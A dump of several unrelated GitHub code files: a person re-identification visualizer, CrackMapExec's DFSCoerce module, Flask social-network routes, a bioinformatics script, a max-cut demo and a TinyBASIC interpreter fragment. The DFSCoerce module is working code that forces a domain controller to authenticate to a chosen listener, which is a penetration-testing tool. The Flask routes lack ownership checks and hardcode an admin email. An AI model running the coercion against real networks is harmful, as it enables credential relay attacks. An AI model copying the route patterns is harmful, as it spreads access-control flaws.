'\n 'Please make sure you set the model output at eval mode '\n 'to be the last convolutional feature maps'.format(\n outputs.dim()\n )\n )\n\n # compute activation maps\n outputs = (outputs**2).sum(1)\n b, h, w = outputs.size()\n outputs = outputs.view(b, h * w)\n outputs = F.normalize(outputs, p=2, dim=1)\n outputs = outputs.view(b, h, w)\n\n if use_gpu:\n imgs, outputs = imgs.cpu(), outputs.cpu()\n\n for j in range(outputs.size(0)):\n # get image name\n path = paths[j]\n imname = osp.basename(osp.splitext(path)[0])\n\n # RGB image\n img = imgs[j, ...]\n for t, m, s in zip(img, img_mean, img_std):\n t.mul_(s).add_(m).clamp_(0, 1)\n img_np = np.uint8(np.floor(img.numpy() * 255))\n img_np = img_np.transpose((1, 2, 0)) # (c, h, w) -> (h, w, c)\n\n # activation map\n am = outputs[j, ...].numpy()\n am = cv2.resize(am, (width, height))\n am = 255 * (am - np.min(am)) / (\n np.max(am) - np.min(am) + 1e-12\n )\n am = np.uint8(np.floor(am))\n am = cv2.applyColorMap(am, cv2.COLORMAP_JET)\n\n # overlapped\n overlapped = img_np*0.3 + am*0.7\n overlapped[overlapped > 255] = 255\n overlapped = overlapped.astype(np.uint8)\n\n # save images in a single figure (add white spacing between images)\n # from left to right: original image, activation map, overlapped image\n grid_img = 255 * np.ones(\n (height, 3*width + 2*GRID_SPACING, 3), dtype=np.uint8\n )\n grid_img[:, :width, :] = img_np[:, :, ::-1]\n grid_img[:,\n width + GRID_SPACING:2*width + GRID_SPACING, :] = am\n grid_img[:, 2*width + 2*GRID_SPACING:, :] = overlapped\n cv2.imwrite(osp.join(actmap_dir, imname + '.jpg'), grid_img)\n\n if (batch_idx+1) % 10 == 0:\n print(\n '- done batch {}/{}'.format(\n batch_idx + 1, len(data_loader)\n )\n )\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--root', type=str)\n parser.add_argument('-d', '--dataset', type=str, default='market1501')\n parser.add_argument('-m', '--model', type=str, default='osnet_x1_0')\n parser.add_argument('--weights', type=str)\n parser.add_argument('--save-dir', type=str, default='log')\n parser.add_argument('--height', type=int, default=256)\n parser.add_argument('--width', type=int, default=128)\n args = parser.parse_args()\n\n use_gpu = torch.cuda.is_available()\n\n datamanager = torchreid.data.ImageDataManager(\n root=args.root,\n sources=args.dataset,\n height=args.height,\n width=args.width,\n batch_size_train=100,\n batch_size_test=100,\n transforms=None,\n train_sampler='SequentialSampler'\n )\n test_loader = datamanager.test_loader\n\n model = torchreid.models.build_model(\n name=args.model,\n num_classes=datamanager.num_train_pids,\n use_gpu=use_gpu\n )\n\n if use_gpu:\n model = model.cuda()\n\n if args.weights and check_isfile(args.weights):\n load_pretrained_weights(model, args.weights)\n\n visactmap(\n model, test_loader, args.save_dir, args.width, args.height, use_gpu\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"PyTorch/contrib/cv/classification/OSNet/tools/visualize_actmap.py","file_name":"visualize_actmap.py","file_ext":"py","file_size_in_byte":5601,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"24729273986","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket import system_errors\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.dcerpc.v5.ndr import NDRCALL\nfrom impacket.dcerpc.v5.dtypes import ULONG, WSTR, DWORD\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.uuid import 
uuidtup_to_bin\nfrom cme.logger import cme_logger\n\n\nclass CMEModule:\n name = \"dfscoerce\"\n description = \"Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n self.listener = None\n\n def options(self, context, module_options):\n \"\"\"\n LISTENER Listener Address (defaults to 127.0.0.1)\n \"\"\"\n self.listener = \"127.0.0.1\"\n if \"LISTENER\" in module_options:\n self.listener = module_options[\"LISTENER\"]\n\n def on_login(self, context, connection):\n trigger = TriggerAuth()\n dce = trigger.connect(\n username=connection.username,\n password=connection.password,\n domain=connection.domain,\n lmhash=connection.lmhash,\n nthash=connection.nthash,\n target=connection.host if not connection.kerberos else connection.hostname + \".\" + connection.domain,\n doKerberos=connection.kerberos,\n dcHost=connection.kdcHost,\n aesKey=connection.aesKey,\n )\n\n if dce is not None:\n context.log.debug(\"Target is vulnerable to DFSCoerce\")\n trigger.NetrDfsRemoveStdRoot(dce, self.listener)\n context.log.highlight(\"VULNERABLE\")\n context.log.highlight(\"Next step: https://github.com/Wh04m1001/DFSCoerce\")\n dce.disconnect()\n\n else:\n context.log.debug(\"Target is not vulnerable to DFSCoerce\")\n\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__(self):\n key = self.error_code\n if key in system_errors.ERROR_MESSAGES:\n error_msg_short = system_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]\n return \"DFSNM SessionError: code: 0x%x - %s - %s\" % (\n self.error_code,\n error_msg_short,\n error_msg_verbose,\n )\n else:\n return \"DFSNM SessionError: unknown error code: 0x%x\" % self.error_code\n\n\n################################################################################\n# RPC CALLS\n################################################################################\nclass NetrDfsRemoveStdRoot(NDRCALL):\n opnum = 13\n structure = (\n (\"ServerName\", WSTR),\n (\"RootShare\", WSTR),\n (\"ApiFlags\", DWORD),\n )\n\n\nclass NetrDfsRemoveStdRootResponse(NDRCALL):\n structure = ((\"ErrorCode\", ULONG),)\n\n\nclass NetrDfsAddRoot(NDRCALL):\n opnum = 12\n structure = (\n (\"ServerName\", WSTR),\n (\"RootShare\", WSTR),\n (\"Comment\", WSTR),\n (\"ApiFlags\", DWORD),\n )\n\n\nclass NetrDfsAddRootResponse(NDRCALL):\n structure = ((\"ErrorCode\", ULONG),)\n\n\nclass TriggerAuth:\n def connect(self, username, password, domain, lmhash, nthash, aesKey, target, doKerberos, dcHost):\n rpctransport = transport.DCERPCTransportFactory(r\"ncacn_np:%s[\\PIPE\\netdfs]\" % target)\n if hasattr(rpctransport, \"set_credentials\"):\n rpctransport.set_credentials(\n username=username,\n password=password,\n domain=domain,\n lmhash=lmhash,\n nthash=nthash,\n aesKey=aesKey,\n )\n\n if doKerberos:\n rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)\n # if target:\n # rpctransport.setRemoteHost(target)\n\n rpctransport.setRemoteHost(target)\n dce = rpctransport.get_dce_rpc()\n cme_logger.debug(\"[-] Connecting to %s\" % r\"ncacn_np:%s[\\PIPE\\netdfs]\" % target)\n try:\n dce.connect()\n except Exception as e:\n cme_logger.debug(\"Something went wrong, check error status => 
%s\" % str(e))\n return\n try:\n dce.bind(uuidtup_to_bin((\"4FC742E0-4A10-11CF-8273-00AA004AE673\", \"3.0\")))\n except Exception as e:\n cme_logger.debug(\"Something went wrong, check error status => %s\" % str(e))\n return\n cme_logger.debug(\"[+] Successfully bound!\")\n return dce\n\n def NetrDfsRemoveStdRoot(self, dce, listener):\n cme_logger.debug(\"[-] Sending NetrDfsRemoveStdRoot!\")\n try:\n request = NetrDfsRemoveStdRoot()\n request[\"ServerName\"] = \"%s\\x00\" % listener\n request[\"RootShare\"] = \"test\\x00\"\n request[\"ApiFlags\"] = 1\n if self.args.verbose:\n cme_logger.debug(request.dump())\n # logger.debug(request.dump())\n resp = dce.request(request)\n\n except Exception as e:\n cme_logger.debug(e)\n","repo_name":"byt3bl33d3r/CrackMapExec","sub_path":"cme/modules/dfscoerce.py","file_name":"dfscoerce.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":7833,"dataset":"github-code","pt":"7"} +{"seq_id":"40929777468","text":"from flask import render_template, flash, redirect, url_for, request\nfrom flask_login import current_user, login_required\nfrom flask_babel import _\nfrom app.main.forms import EditProfileForm, PostForm, ComForm, EditPostForm, EditCom\nfrom app.models import User, Post\nfrom app.main import bp\nfrom flask_paginate import Pagination, get_page_args\nfrom datetime import datetime\nfrom app.dbconn import conn\n\nconn = conn()\n\n\n@bp.route('/', methods=['GET', 'POST'])\n@bp.route('/index', methods=['GET', 'POST'])\n@login_required\ndef index():\n return redirect(url_for('main.user', id=current_user.id))\n\n\n@bp.route('/edit_post/', methods=['GET', 'POST'])\n@login_required\ndef edit_post(id):\n form = EditPostForm()\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where login = %s',\n [current_user.login])\n user = cursor.fetchone()\n cursor.execute('SELECT * FROM POST WHERE idpost = %s', [id])\n text = cursor.fetchone()\n conn.commit()\n #vremya = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n if form.validate_on_submit():\n if user is None:\n return redirect(url_for('main.user', id=user[4]))\n else:\n cursor.execute('UPDATE POST SET tekst = %s WHERE idpost = %s', [form.editpost.data, id])\n conn.commit()\n return redirect(url_for('main.user', id=text[4]))\n elif request.method == 'GET':\n form.editpost.data = text[0]\n return render_template('edit_post.html', title=_('Редактирование') ,form=form)\n\n\n@bp.route('/edit_com/', methods=['GET', 'POST'])\n@login_required\ndef edit_com(id):\n form = EditCom()\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where login = %s',\n [current_user.login])\n user = cursor.fetchone()\n cursor.execute('SELECT * FROM com WHERE idcom = %s', [id])\n text = cursor.fetchone()\n conn.commit()\n #vremya = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n if form.validate_on_submit():\n if user is None:\n return redirect(url_for('main.user', id=user[4]))\n else:\n cursor.execute('UPDATE COM SET tekst = %s WHERE idcom = %s', [form.editcom.data, id])\n conn.commit()\n return redirect(url_for('main.user', id=text[5]))\n elif request.method == 'GET':\n form.editcom.data = text[0]\n return render_template('edit_post.html', title=_('Редактирование') ,form=form)\n\n\n@bp.route('/user/id', methods=['GET', 'POST'])\n@login_required\ndef user(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where iduser = %s',\n [id])\n user = cursor.fetchone()\n conn.commit()\n if user is None:\n return redirect(url_for('main.index'))\n if 
current_user.id != user[4]:\n cursor.execute('select * from addfriend where id2user = %s and id1user = %s',\n [current_user.id,user[4]])\n frend = cursor.fetchone()\n conn.commit()\n if frend is None:\n followed = False\n else:\n followed = True\n cursor.execute('select count(*) from addfriend where id1user = %s',\n [user[4]])\n followers = cursor.fetchone()\n followers = int(followers[0])\n cursor.execute('select count(*) from addfriend where id2user = %s',\n [user[4]])\n following = cursor.fetchone()\n following = int(following[0])\n conn.commit()\n form = PostForm()\n if form.validate_on_submit():\n vremya = datetime.now().strftime(\"%Y-%m-%d %X\")\n if id == current_user.id:\n cursor.execute('INSERT INTO post(tekst,datapost,idavtor,idrecepient) VALUES (%s,%s,%s,%s)',\n [form.post.data,vremya,current_user.id,current_user.id])\n conn.commit()\n else:\n cursor.execute('INSERT INTO post(tekst,datapost,idavtor,idrecepient) VALUES (%s,%s,%s,%s)',\n [form.post.data, vremya, current_user.id, user[4]])\n conn.commit()\n return redirect(url_for('main.user', id=user[4]))\n cursor.execute(\n 'SELECT * FROM POST inner join uzer on uzer.iduser = post.idavtor WHERE idrecepient = %s order by datapost DESC',\n [user[4]])\n posts = cursor.fetchall()\n conn.commit()\n cursor.execute(\n 'SELECT * FROM POST inner join com on post.idpost=com.idpost inner join uzer on uzer.iduser = com.idavtor WHERE post.idrecepient = %s order by datacom ASC',\n [user[4]])\n coms = cursor.fetchall()\n conn.commit()\n page, per_page, offset = get_page_args(page_parameter='page',\n per_page_parameter='per_page')\n cursor.execute(\n 'SELECT count(*) FROM POST WHERE idrecepient = %s',\n [user[4]])\n total = cursor.fetchone()\n conn.commit()\n pagination_posts = posts[offset: offset + per_page]\n pagination = Pagination(page=page, total=total[0], record_name='posts', css_framework='bootstrap4', per_page=10)\n return render_template('user.html', form=form, user=user, fio=user[0], logen=user[5], about_me=user[7], followed=followed,\n following=following, followers=followers, posts=pagination_posts, avatar=user[8], coms=coms, id=user[4], pagination=pagination)\n\n\n@bp.route('/user/id/popup')\n@login_required\ndef user_popup(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where iduser = %s',\n [id])\n user = cursor.fetchone()\n conn.commit()\n if user is None:\n flash(_('User %(username)s not found.', username=user[5]))\n return redirect(url_for('main.index'))\n if current_user.id != user[4]:\n cursor.execute('select * from addfriend where id2user = %s and id1user = %s',\n [current_user.id,id])\n frend = cursor.fetchone()\n conn.commit()\n if frend is None:\n followed = False\n else:\n followed = True\n cursor.execute(\n 'SELECT * FROM vo natural join kafedra natural join facultet natural join vuz where iduser = %s', [id])\n vishobr = cursor.fetchone()\n conn.commit()\n if vishobr is not None:\n kafedra = vishobr[6]\n facultet = vishobr[7]\n vuz = vishobr[8]\n else:\n kafedra = None\n facultet = None\n vuz = None\n cursor.execute('select count(*) from addfriend where id1user = %s',\n [id])\n followers = cursor.fetchone()\n followers = int(followers[0])\n cursor.execute('select count(*) from addfriend where id2user = %s',\n [id])\n following = cursor.fetchone()\n following = int(following[0])\n conn.commit()\n return render_template('user_popup.html', user=user, fio=user[0], logen=user[5], about_me=user[7], followed=followed,\n following=following, followers=followers, avatar=user[8], phone=user[1], 
gender=user[2],\n dr=user[3], vuz=vuz, kafedra=kafedra, facultet=facultet, iduser=user[4])\n\n\n@bp.route('/edit_profile', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form = EditProfileForm(current_user.login)\n cursor = conn.cursor()\n vuz = form.SelVUZ.data\n cursor.execute('select idFack,nameFack from facultet where idvuz = %s', [vuz])\n fack = cursor.fetchall()\n conn.commit()\n kolvofack = len(fack)\n form.SelFack.choices = fack\n Fack = form.SelFack.data\n cursor.execute('select idKafedra,nameKafedra from kafedra where idfack = %s', [Fack])\n kaf = cursor.fetchall()\n conn.commit()\n form.SelKaf.choices = kaf\n Kaf = form.SelKaf.data\n if form.validate_on_submit():\n cursor = conn.cursor()\n current_user.fio = form.fio.data\n current_user.phone = form.phone.data\n current_user.gender = form.gender.data\n current_user.about_me = form.about_me.data\n current_user.avatar = form.avatar.data\n cursor.execute('update Uzer set fio = %s, login = %s, phone = %s, gender = %s, about_me = %s, avatar = %s where login = %s',\n [current_user.fio,form.login.data,current_user.phone,current_user.gender,current_user.about_me,current_user.avatar,current_user.login])\n conn.commit()\n cursor.execute('SELECT iduser FROM VO WHERE iduser = %s', [current_user.id])\n iduser = cursor.fetchone()\n conn.commit()\n if iduser is None:\n cursor.execute('INSERT INTO VO(iduser,idvuz,idfack,idkafedra) VALUES(%s,%s,%s,%s)', [current_user.id,vuz,Fack,Kaf])\n conn.commit()\n else:\n cursor.execute('UPDATE VO SET idvuz = %s,idfack = %s, idkafedra = %s WHERE iduser = %s',\n [vuz, Fack, Kaf,current_user.id])\n conn.commit()\n current_user.login = form.login.data\n flash(_('Your changes have been saved.'))\n return redirect(url_for('main.edit_profile'))\n elif request.method == 'GET':\n form.fio.data = current_user.fio\n form.login.data = current_user.login\n form.phone.data = current_user.phone\n form.gender.data = current_user.gender\n form.about_me.data = current_user.about_me\n form.avatar.data = current_user.avatar\n cursor.execute('SELECT idvuz,idfack,idkafedra from VO where iduser = %s', [current_user.id])\n numb = cursor.fetchone()\n if numb is not None:\n form.SelVUZ.data = numb[0]\n form.SelFack.data = numb[1]\n form.SelKaf.data = numb[2]\n return render_template('edit_profile.html', title=_('Edit Profile'),\n form=form, vuz=vuz, kolvofack=kolvofack, Kaf=Kaf, fack=fack)\n\n\n@bp.route('/follow/')\n@login_required\ndef follow(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where iduser = %s',\n [id])\n user = cursor.fetchone()\n conn.commit()\n if user is None:\n flash(_('User %(username)s not found.', username=user[5]))\n return redirect(url_for('main.index'))\n if current_user.login == user[5]:\n flash(_('You cannot unfollow yourself!'))\n return redirect(url_for('main.user', id=user[4]))\n cursor = conn.cursor()\n cursor.execute(\n 'insert into addfriend (dataadd,id1user,id2user) values(clock_timestamp(),%s,%s)',\n (user[4], current_user.id))\n cursor.close()\n conn.commit()\n flash(_('You are following %(username)s!', username=user[5]))\n return redirect(url_for('main.user', id=user[4]))\n\n\n@bp.route('/unfollow/')\n@login_required\ndef unfollow(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where iduser = %s',\n [id])\n user = cursor.fetchone()\n conn.commit()\n if user is None:\n flash(_('User %(username)s not found.', username=user[5]))\n return redirect(url_for('main.index'))\n if user == current_user:\n flash(_('You cannot unfollow yourself!'))\n 
return redirect(url_for('main.user', id=user[4]))\n cursor.execute(\n 'DELETE FROM addfriend WHERE id2user = %s and id1user = %s',\n [current_user.id,user[4]])\n conn.commit()\n flash(_('You are not following %(username)s.', username=user[5]))\n return redirect(url_for('main.user', id=user[4]))\n\n\n@bp.route('/deletepost/')\n@login_required\ndef deletepost(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where login = %s',\n [current_user.login])\n user = cursor.fetchone()\n if user[5] == current_user.login:\n if current_user.login == 'tehno-09@mail.ru':\n cursor.execute(\n 'SELECT idrecepient from post where idpost=%s',\n [id])\n biba = cursor.fetchone()\n conn.commit()\n cursor.execute(\n 'SELECT * from com where idpost = %s',\n [id])\n bibaboba = cursor.fetchone()\n conn.commit()\n if bibaboba is None:\n cursor.execute(\n 'DELETE FROM post WHERE idpost=%s',\n [id])\n conn.commit()\n else:\n cursor.execute('DELETE FROM COM WHERE idpost=%s', [id])\n conn.commit()\n cursor.execute(\n 'DELETE FROM post WHERE idpost = %s',\n [id])\n conn.commit()\n cursor.close()\n return redirect(url_for('main.user', id=biba[0]))\n else:\n cursor.execute(\n 'SELECT idrecepient from post where (idavtor = %s and idpost = %s) or (idrecepient = %s and idpost = %s)',\n [current_user.id, id, current_user.id, id])\n biba = cursor.fetchone()\n cursor.execute(\n 'SELECT * from com where idpost = %s',\n [id])\n bibaboba = cursor.fetchone()\n conn.commit()\n if bibaboba is None:\n cursor.execute(\n 'DELETE FROM post WHERE (idavtor = %s and idpost = %s) or (idrecepient = %s and idpost = %s)',\n [current_user.id, id, current_user.id, id])\n conn.commit()\n else:\n cursor.execute('DELETE FROM COM WHERE idpost=%s', [id])\n conn.commit()\n cursor.execute(\n 'DELETE FROM post WHERE (idavtor = %s and idpost = %s) or (idrecepient = %s and idpost = %s)',\n [current_user.id, id, current_user.id, id])\n conn.commit()\n return redirect(url_for('main.user', id=biba[0]))\n return redirect(url_for('main.user', id=current_user.id))\n\n\n@bp.route('/comment/', methods=['GET', 'POST'])\n@login_required\ndef comment(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where login = %s',\n [current_user.login])\n user = cursor.fetchone()\n cursor.execute('select idrecepient,idavtor from post where idpost = %s',\n [id])\n usten = cursor.fetchone()\n conn.commit()\n forma = ComForm()\n if forma.validate_on_submit():\n vremy = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n if user is None:\n return redirect(url_for('main.index'))\n else:\n cursor.execute('INSERT INTO com(tekst,datacom,idavtor,idpost,idrecepient,idrecepientpost) VALUES (%s,%s,%s,%s,%s,%s)',\n [forma.com.data, vremy, current_user.id, id, usten[0],usten[1]])\n conn.commit()\n return redirect(url_for('main.user', id=usten[0]))\n return render_template('sendcom.html', forma=forma)\n\n@bp.route('/deletecom/')\n@login_required\ndef deletecom(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where login = %s',\n [current_user.login])\n user = cursor.fetchone()\n if user[5] == current_user.login:\n if current_user.login == 'tehno-09@mail.ru':\n cursor.execute(\n 'SELECT idrecepient from com where idcom=%s',\n [id])\n biba = cursor.fetchone()\n conn.commit()\n cursor.execute(\n 'DELETE FROM com WHERE idcom=%s',\n [id])\n conn.commit()\n cursor.close()\n return redirect(url_for('main.user', id=biba[0]))\n else:\n cursor.execute(\n 'SELECT idrecepient from com where (idavtor = %s and idcom = %s) or (idrecepient = %s and idcom = 
%s)',\n [current_user.id, id, current_user.id, id])\n biba = cursor.fetchone()\n conn.commit()\n cursor.execute(\n 'DELETE FROM com WHERE (idavtor = %s and idcom = %s) or (idrecepient = %s and idcom = %s)',\n [current_user.id, id, current_user.id, id])\n conn.commit()\n cursor.close()\n return redirect(url_for('main.user', id=biba[0]))\n return redirect(url_for('main.user', id=current_user.id))\n\n\n@bp.route('/following/', methods=['GET', 'POST'])\n@login_required\ndef folowww(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where iduser = %s',\n [id])\n user = cursor.fetchone()\n cursor.execute(\n 'SELECT * FROM addfriend inner join uzer on addfriend.id1user=uzer.iduser and addfriend.id2user = %s',\n [id])\n frendi = cursor.fetchall()\n conn.commit()\n friendempty = False\n if len(frendi) == 0:\n friendempty = True\n idfoll = id\n return render_template('unfoloww.html', title=_('Пiдписки'), frendi=frendi, friendempty=friendempty, idfoll=idfoll,\n login=user[5], id=user[4])\n\n\n@bp.route('/followers/', methods=['GET', 'POST'])\n@login_required\ndef foloww(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where iduser = %s',\n [id])\n user = cursor.fetchone()\n cursor.execute(\n 'SELECT * FROM addfriend inner join uzer on addfriend.id2user=uzer.iduser and addfriend.id1user = %s',\n [id])\n frendi = cursor.fetchall()\n conn.commit()\n friendempty = False\n if len(frendi) == 0:\n friendempty = True\n idfoll = id\n return render_template('foloww.html', title=_('Пiдписники'), frendi=frendi, friendempty=friendempty, idfoll=idfoll,\n login=user[5], id=user[4])\n\n\n@bp.route('/delete_profile/')\n@login_required\ndef delete_profile(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where login = %s',\n [current_user.login])\n user = cursor.fetchone()\n conn.commit()\n if user[5] == current_user.login and current_user.login == 'tehno-09@mail.ru':\n cursor.execute(\n 'DELETE FROM addfriend WHERE id1user = %s or id2user = %s',\n [id,id])\n conn.commit()\n cursor.execute(\n 'DELETE FROM com WHERE idavtor = %s or idrecepient = %s or idrecepientpost =%s',\n [id,id,id])\n conn.commit()\n cursor.execute(\n 'DELETE FROM post WHERE idavtor = %s or idrecepient = %s',\n [id,id])\n conn.commit()\n cursor.execute(\n 'DELETE FROM vo WHERE iduser = %s',\n [id])\n conn.commit()\n cursor.execute(\n 'DELETE FROM uzer WHERE iduser = %s',\n [id])\n conn.commit()\n return redirect(url_for('main.user', id=id))\n return redirect(url_for('main.user', id=current_user.id))","repo_name":"b4r4b4n/sosnet","sub_path":"app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":18472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"11910313077","text":"from app import create_app\nfrom flask import request, jsonify, abort\nfrom app.token import verify_token\nfrom app.models import User, Role\nfrom flask_login import login_user\n\napp = create_app('dev')\n\nno_login_request = []\n\n\ndef add_config():\n no_login_request.append('/user/login')\n no_login_request.append('/user/check_token')\n no_login_request.append('/user/upload_user_info_csv')\n # no_login_request.append('/user/download_import_user_template')\n\n\nadd_config()\n\n\n@app.before_request\ndef check_token():\n # request.path\n if request.path in no_login_request:\n return\n form = request.form\n if form:\n cookie_token = form.get('token')\n cookie_id = form.get('user_id')\n if cookie_token:\n user_info_string = 
verify_token(cookie_token)\n user_id = int(user_info_string['user_id'])\n cookie_id = int(cookie_id)\n if user_id == cookie_id:\n user = User.load_user(user_id)\n if user:\n login_user(user)\n return\n abort(jsonify({'status': '203', 'message': '验证失败'}))","repo_name":"KinderFire/CRE_TMPL","sub_path":"flask/flasky.py","file_name":"flasky.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15058734895","text":"#!/usr/bin/env python3\n\nfrom Bio import SeqIO\n\nrec = SeqIO.index_db(snakemake.input.fdb)\nrec = rec[snakemake.params.acc]\nif snakemake.params.pid:\n feature = next(\n ele\n for ele in rec.features\n if ele.type == \"CDS\" and ele.qualifiers[\"protein_id\"][0] == snakemake.params.pid\n )\n rec = feature.extract(rec)\n rec.id = snakemake.params.pid\n product = feature.qualifiers.get(\"product\", [\"n/a\"])[0]\n rec.description = f\"{rec.id}|{feature.location} {product}\"\n\nSeqIO.write(rec, snakemake.output.fas, \"fasta\")\nSeqIO.write(rec, snakemake.output.gbk, \"genbank\")\n","repo_name":"dnanto/dissertation-prototype-1","sub_path":"workflow/scripts/ffref.py","file_name":"ffref.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9671638680","text":"\"\"\"\nJust a usage example\n\"\"\"\n\nimport networkx as nx\nimport matplotlib.pylab as plt\n\nimport maxcutpy.graphdraw as gd\nimport maxcutpy.maxcut as mc\nimport maxcutpy.graphcut as gc\nimport maxcutpy.graphtest as gt\n\n\n__license__ = \"GPL\"\n\n\nif __name__ == '__main__':\n\n seed = 123\n\n # most used graphs\n G1 = nx.erdos_renyi_graph(n=24, p=0.3, seed=seed)\n\n # some cool graphs\n G2 = nx.star_graph(20)\n G3 = nx.path_graph(30)\n G4 = nx.petersen_graph()\n G5 = nx.dodecahedral_graph()\n G6 = nx.house_graph()\n G7 = nx.moebius_kantor_graph()\n G8 = nx.barabasi_albert_graph(5, 4)\n G9 = nx.heawood_graph()\n G10 = nx.icosahedral_graph()\n G11 = nx.sedgewick_maze_graph()\n G12 = nx.havel_hakimi_graph([1, 1])\n G13 = nx.complete_graph(20)\n G14 = nx.bull_graph()\n\n G = G1 # choose a graph from the list\n\n gd.draw_custom(G)\n plt.show()\n\n #exact cut\n print(\"Time 'local_consistent_max_cut':\" + str(gt.execution_time(mc.local_consistent_max_cut, 1, G)))\n print('Edges cut: ' + str(gc.cut_edges(G)))\n print('\\n')\n print(\"Time 'lazy_local_consistent_max_cut':\" + str(gt.execution_time(mc.lazy_local_consistent_max_cut, 1, G)))\n print('Edges cut: ' + str(gc.cut_edges(G)))\n print('\\n')\n\n gd.draw_cut_graph(G)\n plt.show()\n\n #approximated cut\n print(\"Time 'trevisan_approximation_alg': \" + str(gt.execution_time(mc.trevisan_approximation_alg, 1, G)))\n print('Edges cut: ' + str(gc.cut_edges(G)))\n\n gd.draw_cut_graph(G)\n plt.show()\n\n print('\\n')\n print('Time Greedy: ' + str(gt.execution_time(mc.greedy_cut, 1, G)))\n print('Edges cut: ' + str(gc.cut_edges(G)))\n\n gd.draw_cut_graph(G)\n plt.show()\n\n\n","repo_name":"bluesurfer/maxCutPy","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"16066941519","text":"from tiny_basic.errors import TinyBasicException\r\n\r\n\r\nclass Variable:\r\n TYPE_STR = 'STRING'\r\n TYPE_NUM = 'NUM'\r\n TYPE_INT = 'INT'\r\n TYPE_ANY = ''\r\n\r\n def __init__(self, name: str, base_type: str, dim: int = 1, value = None):\r\n self.base_type = 
base_type\r\n        self.dim = dim\r\n        self.name = name\r\n        if self.base_type == Variable.TYPE_STR and not name.endswith('$'):\r\n            raise TinyBasicException(f'STRING VAR MUST END WITH $ {name}')\r\n        if self.base_type == Variable.TYPE_NUM and name.endswith('$'):\r\n            raise TinyBasicException(f'NUMERIC VAR MUST NOT END WITH $ {name}')\r\n        if dim < 0:\r\n            raise TinyBasicException(f'DIM should be a positive number, not {dim} for {name}')\r\n        if value is None:\r\n            self.value = []\r\n            for i in range(0, dim):\r\n                self.value.append(None)\r\n        else:\r\n            if len(value) != dim:\r\n                raise TinyBasicException(f'Wrong init value for {name}')\r\n            self.value = value\r\n\r\n    def get_type(self):\r\n        if self.dim == 1:\r\n            return self.base_type\r\n        else:\r\n            return f'{self.base_type}[{self.dim}]'\r\n\r\n    def verify_index(self, index: int):\r\n        if (not 0 <= index < self.dim) or self.value is None:\r\n            raise TinyBasicException(f'{index} IS OUT OF BOUNDS FOR {self.name}: 0..{self.dim}')\r\n\r\n    def read(self, index: int, type: str or None = None):\r\n        if type is not None and self.base_type != type:\r\n            raise TinyBasicException(f'{self.name} IS NOT {type}')\r\n        self.verify_index(index)\r\n        result = self.value[index]\r\n        if result is None:\r\n            raise TinyBasicException(f'{self.name}[{index}] IS NOT YET ASSIGNED')\r\n        return result\r\n\r\n    def write(self, index: int, value):\r\n        self.verify_index(index)\r\n        self.value[index] = value\r\n\r\n    def read_num(self, index: int = 0) -> int or float:\r\n        result = self.read(index, Variable.TYPE_NUM)\r\n        if not (isinstance(result, int) or isinstance(result, float)):\r\n            raise TinyBasicException(f'{self.name}[{self.dim}] IS NOT A NUMBER')\r\n        return result\r\n\r\n    def read_str(self, index: int = 0) -> str:\r\n        result = self.read(index, Variable.TYPE_STR)\r\n        if not (isinstance(result, str)):\r\n            raise TinyBasicException(f'{self.name}[{self.dim}] IS NOT A STRING')\r\n        return result\r\n\r\n    def write_num(self, value: int or float, index: int = 0):\r\n        if not (isinstance(value, int) or isinstance(value, float)):\r\n            raise TinyBasicException(f'{value} IS NOT A NUMBER')\r\n        self.write(index, value)\r\n\r\n    def write_str(self, value: str, index: int = 0):\r\n        if not isinstance(value, str):\r\n            raise TinyBasicException(f'{value} IS NOT A STRING')\r\n        self.write(index, value)\r\n\r\n    def write_num_array(self, value: list[int or float]):\r\n        self.dim = len(value)\r\n        self.value = value\r\n\r\n    def write_str_array(self, value: list[str]):\r\n        self.dim = len(value)\r\n        self.value = 